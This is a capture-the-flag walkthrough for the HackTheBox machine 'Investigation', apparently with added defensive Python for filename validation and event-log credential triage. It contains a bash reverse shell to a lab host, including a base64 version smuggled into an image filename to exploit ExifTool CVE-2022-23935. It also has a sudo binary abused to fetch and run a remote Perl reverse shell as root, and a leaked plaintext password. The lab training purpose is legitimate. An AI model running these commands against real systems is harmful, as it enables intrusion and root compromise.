# HackTheBox "Investigation"

<figure><img src="/files/ODPAn25ZGvhhfsTPXlTt" alt="Info Card"><figcaption><p>Info Card</p></figcaption></figure>

## Introduction

[Investigation](https://www.hackthebox.com/machines/investigation) is a medium box released on January 21st, 2023 by Derezzed.

## User Own

Nmap scan:

```
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-19 14:02 EDT
Nmap scan report for 10.10.11.197
Host is up (0.033s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 2f1e6306aa6ebbcc0d19d4152674c6d9 (RSA)
|   256 274520add2faa73a8373d97c79abf30b (ECDSA)
|_  256 4245eb916e21020617b2748bc5834fe0 (ED25519)
80/tcp open  http    Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://eforenzics.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: eforenzics.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.79 seconds
```

The website has a file upload that takes an image file and returns a text file listing the uploaded image's metadata in detail.

{% code title="Example Output" %}

```
ExifTool Version Number         : 12.37
File Name                       : test.png
Directory                       : .
File Size                       : 384 bytes
File Modification Date/Time     : 2023:04:19 18:06:38+00:00
File Access Date/Time           : 2023:04:19 18:06:38+00:00
File Inode Change Date/Time     : 2023:04:19 18:06:38+00:00
File Permissions                : -rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 200
Image Height                    : 150
Bit Depth                       : 4
Color Type                      : Palette
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Gamma                           : 2.2
White Point X                   : 0.3127
White Point Y                   : 0.329
Red X                           : 0.64
Red Y                           : 0.33
Green X                         : 0.3
Green Y                         : 0.6
Blue X                          : 0.15
Blue Y                          : 0.06
Palette                         : (Binary data 24 bytes, use -b option to extract)
Background Color                : 0
Modify Date                     : 2022:08:10 03:53:15
Warning                         : [minor] Text/EXIF chunk(s) found after PNG IDAT (may be ignored by some readers)
Datecreate                      : 2022-08-10T03:53:15+00:00
Datemodify                      : 2022-08-10T03:53:15+00:00
Image Size                      : 200x150
Megapixels                      : 0.030

```

{% endcode %}

According to the output, the tool used to gather the image details is ExifTool 12.37. This version of ExifTool is vulnerable to CVE-2022-23935. We can rename a `.jpg` or `.png` file to be a command that would give us a reverse shell, like `bash -i >& /dev/tcp/10.0.x.x/1234 0>&1`, but a filename cannot contain forward slashes. We can bypass this restriction by encoding the reverse shell in Base64 and decoding it on the machine, using the filename `echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLngueC8xMjM0IDA+JjE= | base64 -d | bash |`. The Base64-encoded string contains the bash reverse shell, which the server runs when the image is uploaded.
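The root cause on the server side is that the user-supplied filename reaches ExifTool unchanged. The following Python is an added example, not code from the box or from ExifTool, showing the mitigation an upload handler should apply: validate the name against a conservative pattern, store the file under a server-chosen random name so nothing attacker-controlled ends up in the path, and invoke the analyser as an argument vector rather than through a shell. `ALLOWED_EXTENSIONS`, `FORBIDDEN` and the upload directory are assumptions made for the example.

```python
import os
import re
import secrets

# Extensions the upload endpoint is willing to accept (constructed policy).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png"}

# Characters with special meaning to a shell or to Perl's two-argument open();
# a name containing any of them is rejected outright.
FORBIDDEN = set('|<>&;`$"\'\\ \t\n')

# Base name, then a single extension; no path separators, no metacharacters.
SAFE_NAME = re.compile(r"[A-Za-z0-9._-]+\.([A-Za-z0-9]+)")


def is_safe_filename(name: str) -> bool:
    """Accept only a bare, non-empty filename with an allowed extension."""
    if not name or name != os.path.basename(name):
        return False                      # empty, or carries a directory part
    if any(ch in FORBIDDEN for ch in name):
        return False                      # shell / open() metacharacter present
    match = SAFE_NAME.fullmatch(name)
    if match is None:
        return False
    return match.group(1).lower() in ALLOWED_EXTENSIONS


def storage_name(name: str) -> str:
    """Return a random server-chosen name that keeps only the validated extension."""
    if not is_safe_filename(name):
        raise ValueError("rejected upload filename")
    ext = name.rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


def analyser_argv(upload_dir: str, stored: str) -> list[str]:
    """Build the analyser command as an argv list (never a shell string).

    `upload_dir` is assumed to be a directory the server controls; `stored`
    is the name returned by storage_name(), so it can never start with '-'
    or contain a metacharacter.
    """
    return ["exiftool", os.path.join(upload_dir, stored)]


if __name__ == "__main__":
    for candidate in ["test.png", "shell.png|", "../test.png", "test.php"]:
        print(f"{candidate!r:20} safe={is_safe_filename(candidate)}")
    print(analyser_argv("/srv/uploads", storage_name("test.png")))
```

The random name is the important part: even if a later ExifTool bug is found in filename handling, the name handed to it is one the server generated, and the original name survives only as metadata in the application's own records.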

After gaining a reverse shell, we are logged in as `www-data`. Checking `/etc/passwd` reveals one user named `smorton`. Searching for anything owned by `smorton` reveals a `.msg` file.

```
find / -user smorton 2>/dev/null
/home/smorton
/usr/local/investigation/Windows Event Logs for Analysis.msg
```

We can download this file by using the command `cp "Windows Event Logs for Analysis.msg" /var/www/html/analysed_images/w.msg` and then going to the link `http://eforenzics.htb/analysed_images/w.msg`.

This `.msg` file is supposed to be opened with Outlook. We can convert this to a `.eml` with [`msgconvert`](https://superuser.com/a/979603) and open it in Thunderbird.

```
Hi Steve,

Can you look through these logs to see if our analysts have been logging on to the inspection terminal. I'm concerned that they are moving data on to production without following our data transfer procedures. 

Regards.
Tom
```

Attached to this email is `evtx-logs.zip`, which contains `security.evtx`. The `.evtx` format is a Microsoft Windows event log, which can be opened with Event Viewer on Windows.

From [HackTricks](https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics#security), security logs can contain useful artifacts. Filtering the log on event ID 4625 (an account failed to log on) shows when someone tried to log in but failed.

<figure><img src="/files/SqtFpDQsdgt9SnNkJmDk" alt="Log"><figcaption><p>Log</p></figcaption></figure>

This log shows that someone accidentally typed their password into the username field. Subsequent logs show that the user `SMorton` logged in successfully shortly after the failed attempt, so the password most likely belongs to him. Logging in to `smorton` over SSH with the password `Def@ultf0r3nz!csPa$$` gets us in, and with it the `user.txt` flag.
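The pattern above, a 4625 whose `TargetUserName` looks nothing like an account name followed shortly by a 4624 from the same source, is worth automating when triaging a security log. The following Python is an added example, not part of the write-up or of any tool used in it; it parses event records in the Windows event XML format (what Event Viewer, `wevtutil /f:xml` or python-evtx produce) and pairs each suspicious failure with the next success from the same address inside a time window. The sample records, the five-minute window and the "unusual characters" heuristic are all constructed for the example.

```python
import re
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta

# Namespace every Windows event XML record declares on its <Event> element.
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed sample records (not from the box's security.evtx); only the
# fields this analysis needs are present.
SAMPLE_EVENTS = [
    """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
      <System><EventID>4625</EventID>
        <TimeCreated SystemTime="2022-08-01T08:00:00.000000Z"/></System>
      <EventData>
        <Data Name="TargetUserName">S3cretPa$$w0rd!</Data>
        <Data Name="IpAddress">10.0.0.5</Data>
      </EventData></Event>""",
    """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
      <System><EventID>4624</EventID>
        <TimeCreated SystemTime="2022-08-01T08:00:07.000000Z"/></System>
      <EventData>
        <Data Name="TargetUserName">alice</Data>
        <Data Name="IpAddress">10.0.0.5</Data>
      </EventData></Event>""",
    # A second suspicious failure whose matching success comes too late.
    """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
      <System><EventID>4625</EventID>
        <TimeCreated SystemTime="2022-08-01T09:00:00.000000Z"/></System>
      <EventData>
        <Data Name="TargetUserName">Pa$$phrase!!</Data>
        <Data Name="IpAddress">10.0.0.9</Data>
      </EventData></Event>""",
    """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
      <System><EventID>4624</EventID>
        <TimeCreated SystemTime="2022-08-01T09:20:00.000000Z"/></System>
      <EventData>
        <Data Name="TargetUserName">bob</Data>
        <Data Name="IpAddress">10.0.0.9</Data>
      </EventData></Event>""",
]

# Characters that are legal in account names (SAM, UPN, DOMAIN\user). Anything
# outside this set is rare in a real user name; tune to your environment.
UNUSUAL = re.compile(r"[^A-Za-z0-9._\-\\@$ ]")


def parse_event(xml_text: str) -> dict:
    """Flatten one record into {'id', 'time', <every EventData field>}."""
    root = ET.fromstring(xml_text)
    event_id = int(root.find("e:System/e:EventID", NS).text)
    stamp = root.find("e:System/e:TimeCreated", NS).get("SystemTime")
    when = datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%S.%fZ")
    fields = {d.get("Name"): (d.text or "")
              for d in root.findall("e:EventData/e:Data", NS)}
    return {"id": event_id, "time": when, **fields}


def looks_like_secret(username: str) -> bool:
    """Heuristic: a 'user name' containing characters no account name would."""
    return UNUSUAL.search(username) is not None


def find_leaked_credentials(events, window=timedelta(minutes=5)) -> list[dict]:
    """Pair each suspicious 4625 with the next 4624 from the same source
    address inside `window`; that account is the likely owner of the secret."""
    parsed = sorted((parse_event(e) for e in events), key=lambda r: r["time"])
    findings = []
    for i, fail in enumerate(parsed):
        if fail["id"] != 4625 or not looks_like_secret(fail.get("TargetUserName", "")):
            continue
        for later in parsed[i + 1:]:
            if later["time"] - fail["time"] > window:
                break                       # records are sorted; stop looking
            if later["id"] == 4624 and later.get("IpAddress") == fail.get("IpAddress"):
                findings.append({
                    "failed_at": fail["time"],
                    "source_ip": fail["IpAddress"],
                    "mistyped_value": fail["TargetUserName"],
                    "account": later["TargetUserName"],
                    "seconds_later": (later["time"] - fail["time"]).total_seconds(),
                })
                break
    return findings


if __name__ == "__main__":
    for hit in find_leaked_credentials(SAMPLE_EVENTS):
        print(f"{hit['failed_at']} {hit['source_ip']}: value typed as user name "
              f"is probably the password of {hit['account']} "
              f"(success {hit['seconds_later']:.0f}s later)")
```

On a real log the `mistyped_value` field is a credential and should be handled as one: reset the account, and keep the finding out of ticket text and chat. The same pairing logic extends naturally to the 4625 `Status`/`SubStatus` codes and `LogonType` if you want to narrow it to interactive logons.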

<figure><img src="/files/6uBSNiLTiHRqer62ZZVa" alt="USER OWN"><figcaption><p>USER OWN</p></figcaption></figure>

## System Own

`sudo -l` reveals:

```
Matching Defaults entries for smorton on investigation:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User smorton may run the following commands on investigation:
    (root) NOPASSWD: /usr/bin/binary
```

Running `/usr/bin/binary` doesn't seem to do anything:

```
sudo /usr/bin/binary
Exiting... 
```

Let's pull the binary down for decompilation.

```
scp smorton@eforenzics.htb:/usr/bin/binary ~/Documents/binary
```

We can use a web-based decompiler like [Decompiler Explorer](https://dogbolt.org/) to see the code. The most accurate output is from Binary Ninja:

{% code lineNumbers="true" %}

```c
int32_t main(int32_t argc, char** argv, char** envp)
{
    if (argc != 3)
    {
        puts("Exiting... ");
        exit(0);
        /* no return */
    }
    if (getuid() != 0)
    {
        puts("Exiting... ");
        exit(0);
        /* no return */
    }
    if (strcmp(argv[2], "lDnxUysaQn") != 0)
    {
        puts("Exiting... ");
        exit(0);
        /* no return */
    }
    puts("Running... ");
    FILE* rax_8 = fopen(argv[2], &data_2027);
    int64_t rax_9 = curl_easy_init();
    int32_t var_40 = 0x2712;
    curl_easy_setopt(rax_9, 0x2712, argv[1], 0x2712);
    int32_t var_3c = 0x2711;
    curl_easy_setopt(rax_9, 0x2711, rax_8, 0x2711);
    int32_t var_38 = 0x2d;
    curl_easy_setopt(rax_9, 0x2d, 1, 0x2d);
    if (curl_easy_perform(rax_9) != 0)
    {
        puts("Exiting... ");
        exit(0);
        /* no return */
    }
    int64_t rax_25 = snprintf(nullptr, 0, &data_202a, argv[2]);
    char* rax_28 = malloc((rax_25 + 1));
    snprintf(rax_28, (rax_25 + 1), &data_202a, argv[2]);
    int64_t rax_37 = snprintf(nullptr, 0, "perl ./%s", rax_28);
    char* rax_40 = malloc((rax_37 + 1));
    snprintf(rax_40, (rax_37 + 1), "perl ./%s", rax_28);
    fclose(rax_8);
    curl_easy_cleanup(rax_9);
    setuid(0);
    system(rax_40);
    system("rm -f ./lDnxUysaQn");
    return 0;
}
```

{% endcode %}

The program has a couple of checks to make sure we use it correctly.

Firstly, the program checks at line 3 that it was given exactly 3 arguments; otherwise it exits. We get past this check with `sudo /usr/bin/binary arg2 arg3`, because the first argument in C (`argv[0]`) is always the program itself.

Secondly, the program checks at line 9 that our user ID is 0. Since we are using `sudo`, we pass this check automatically (`root`'s user ID is 0).

Thirdly, the program checks at line 15 that our third argument equals `lDnxUysaQn`. Our command now looks like `sudo /usr/bin/binary arg2 lDnxUysaQn`.

After all these checks, the program initializes cURL at line 23 and sets the URL to the second argument at line 25 (`0x2712` is `CURLOPT_URL`). It retrieves the file from that URL at line 30 and writes it to a file in the current directory named after the third argument, `lDnxUysaQn` (`0x2711` is `CURLOPT_WRITEDATA`). The program then runs that file with Perl as `root` at line 45 and deletes it afterwards. This means we can feed the program the URL of a Perl reverse shell as the second argument and get a shell as `root`.

{% code title="Terminal 1" %}

```
python3 -m http.server 80
```

{% endcode %}

{% code title="Terminal 2" %}

```
smorton@investigation:/tmp$ sudo /usr/bin/binary http://10.10.xx.xx/rev.pl lDnxUysaQn
Running...
Content-Length: 0
Connection: close
Content-Type: text/html

smorton@investigation:/tmp$ Content-Length: 42
Connection: close
Content-Type: text/html

Sent reverse shell to 10.10.xx.xx:1234<p>
```

{% endcode %}

{% code title="Terminal 3" %}

```
nc -nvlp 1234             
listening on [any] 1234 ...
connect to [10.10.xx.xx] from (UNKNOWN) [10.10.11.197] 47318
 03:30:49 up 23:12,  2 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
smorton  pts/2    10.10.xx.xx      02:13    1:07m  0.18s  0.18s -bash
smorton  pts/0    10.10.xx.xx      02:40    0.00s  0.15s  0.15s -bash
Linux investigation 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
uid=0(root) gid=0(root) groups=0(root)
/
/usr/sbin/apache: 0: can't access tty; job control turned off
# cat /root/root.txt
[ROOT FLAG HERE]
```

{% endcode %}

<figure><img src="/files/AIHJ5rdpw6CDdcENoWFm" alt="SYSTEM OWN"><figcaption><p>SYSTEM OWN</p></figcaption></figure>

And that's the box!

<figure><img src="/files/7JacDQpMyUdAMtLFbuMV" alt="PWNED"><figcaption><p>PWNED</p></figcaption></figure>

